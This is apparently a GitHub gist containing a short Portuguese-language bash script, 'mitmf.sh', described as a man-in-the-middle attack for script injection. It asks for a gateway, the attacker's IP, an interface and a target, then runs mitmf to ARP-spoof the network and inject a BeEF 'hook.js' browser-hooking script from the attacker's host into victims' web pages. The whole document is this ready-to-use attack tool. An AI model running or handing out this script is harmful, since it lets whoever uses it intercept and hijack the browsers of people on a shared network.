Skip to content

Instantly share code, notes, and snippets.

@henriquecrw
Last active November 1, 2017 04:52
Show Gist options
  • Save henriquecrw/6ebef5d45c1674b7da8104d0ba54c8fa to your computer and use it in GitHub Desktop.
Save henriquecrw/6ebef5d45c1674b7da8104d0ba54c8fa to your computer and use it in GitHub Desktop.
Man in the Middle + Beef-XSS
#!/bin/bash -
#title : mitmf.sh
#description : Realizar ataque man in the middle para injeção de scripts
#author : Henrique Silva
#date : 29/10/2017
#version : 0.1
#usage : ./mitmf.sh
#bash_version : 4.1.5(1)-release
#==============================================================================
printf "\n\n\n▒█▀▀█ █▀▀ █▀▀ █▀▀ ░░ ▒█▀▄▀█ ░▀░ ▀▀█▀▀ █▀▄▀█ █▀▀\n▒█▀▀▄ █▀▀ █▀▀ █▀▀ ▀▀ ▒█▒█▒█ ▀█▀ ░░█░░ █░▀░█ █▀▀\n▒█▄▄█ ▀▀▀ ▀▀▀ ▀░░ ░░ ▒█░░▒█ ▀▀▀ ░░▀░░ ▀░░░▀ ▀░░\n\n\nwww.blogdopentest.com.br\n\n"
read -p "Digite o GateWay alvo: " gw
read -p "Informe IP Publico/ Privado: " ippp
read -p "Informe a interface (eth0/ wlan0) de Atk: " inter
printf "\nNa próxima - {digite o alvo específico ex: 192.168.1.150, rede com barramento ex: 192.168.1.1/24 ou deixe em branco para rede toda}\n\n"
read -p "IP alvo: " target
if [ -z $target ]; then
mitmf --spoof --arp -i $inter --gateway $gw --inject --js-url http://$ippp:3000/hook.js
else
mitmf --spoof --arp -i $inter --gateway $gw --target $target --inject --js-url http://$ippp:3000/hook.js
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment